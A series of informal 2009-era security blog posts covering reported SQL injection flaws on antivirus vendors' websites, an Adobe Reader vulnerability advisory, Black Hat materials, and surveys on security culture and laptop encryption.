As already blogged Kaspersky went Kerplunk, now its Symantecs turn for a visit from the Romanian Ethical Hacker. This continues to demonstrate that not even the IT Security Vendors can keep up with all the ongoing vulnerabilities, and perhaps sometimes miss judge the risks.

The hacker Uno has posted on blogs and forums of this latest website vulnerability testing, however Symantec are not in agreement.

Symantec responded to reports of the potential snafu with an assurance that its site was and remains secure. Uno had simply stumbled upon an error message, it said. Symantec was notified of a reported security vulnerability on a webpage within Symantec’s website. Upon notification of the potential vulnerability, Symantec immediately took the site down, conducted comprehensive testing and determined that the issue is not a security vulnerability. It appears that the individual who reported it based the report on an error message. Symantec has addressed this issue and the web page is back up and running. Symantec can confirm that no company or customer information was exposed.

Symantec adds that “upon thorough investigation, we have determined that the Blind SQL Injection is, in fact, not effective. The difference in response between valid and injected queries exists because of inconsistent exception handling routine for language options.”

Uno has now uncovered problems of varying seriousness involving the websites of F-secure, emea.symantec.com, usa.kasperky.com, and BitDefender. All the reported flaws involved SQL Injection techniques, a common class of vulnerability used to either attack websites or plant malicious code as part of a drive by download attack.

Finally if you have a look at Uno’s blog you can further read he has even had a little dabble with the UK Lottery, who knows…… It Could Be You 🙂

A recent survey carried out by the Freedom Dynamics shows some interesting results. I found this on The Register today, head over to read more.

Many organisations do not practice entirely what they preach, however. While nearly three quarters of IT staff were reputed to take security seriously (of course there couldn’t be any bias from our IT-professional Register audience), only a quarter of respondents reported that the general workforce in their organisations do the same. This is a little alarming, even if you take into account the possibly skewed opinions of our survey respondents.

To ensure that IT security isn’t deprioritised to the point of irrelevance, it’s worth reiterating how it can play its part. The first thing to keep in mind is that IT security is as much about securing business assets and resources using IT, as it is about securing the IT itself. Three broad areas need protection:

• Business processes, activities and people
• Business and technical information
• IT applications and services

I am a few days late posting on this as I have been abit busy. However on the 19th Feb 09 Adobe Published info on yet another Buffer Overflow Vuln in Adobe Reader.

A critical vulnerability has been identified in Adobe Reader 9 and Acrobat 9 and earlier versions. This vulnerability would cause the application to crash and could potentially allow an attacker to take control of the affected system. There are reports that this issue is being exploited.

Adobe categorizes this as a critical issue and recommends that users update their virus definitions and exercise caution when opening files from untrusted sources.

A patch is expected early March, so until then keep an eye on your IDS and update virus signatures.

The kind people of Black Hat, have now made available selected presentation slides and white papers from Black Hat 2009.

You can view this now from the BH 09 Briefing Archives.

I am sure most of you will have read about last weeks security breach with Kaspersky Labs, the Russian AV vendor. Read more here.

So this has to raise the questions, who is securing the security vendors. Kaspersky say that no data was taken, although this is probably due to the ethical nature of the Romanian hackers, but no one really knows. The story goes that the hackers utilised Google queries to identify Kaspersky systems that were vulnerable to SQL injection, and I think this is really the problem here. We all know how excellent Google Hacking can be, and the power of the search engine queries available, and even though you might need some awesome Google-Fu for some searches, even the basics often yield excellent results.

What this re-emphasises is that if the hackers can resource themselves, and take the time to keep up with vulnerabilities, then organisations security teams should do the same.
So InfoSec professionals should be encourage to spend time keeping up to speed with vulnerabilities associated with their environment, as well as aquiring fundemental skills to carry out activities such as Google searches to understand the organisations risk factors.

Check out these 2 sites below for information on exploits, and patch releases as a first start.

• Milw0rm – Exploits, Vulnerabilities, Papers, Code, etc
• CPNI – Centre for the Protection of National Infrastructure (Patching Advisories)

A recent survey by Kroll Ontrack shows that over 90% of laptop hard disks they recieve for data retrieval are not encrypted.

I admit I dont really find this surprising, companies are not always really aware of the risk of data loss and theft, and especially with portable devices that are easily snatchable. Also with everything security related it can sometimes be difficult to convince the business of the Return On Investment.

Organisations should focus on the financial implications of data loss, the costs to inform their customer, brand damage, penalties to governing bodies and compliance implications.

With so many varying solutions available for partial and full disk encryption, now is an excellent time to consider technical solutions to significantly reduce the risk and exposure levels around data loss.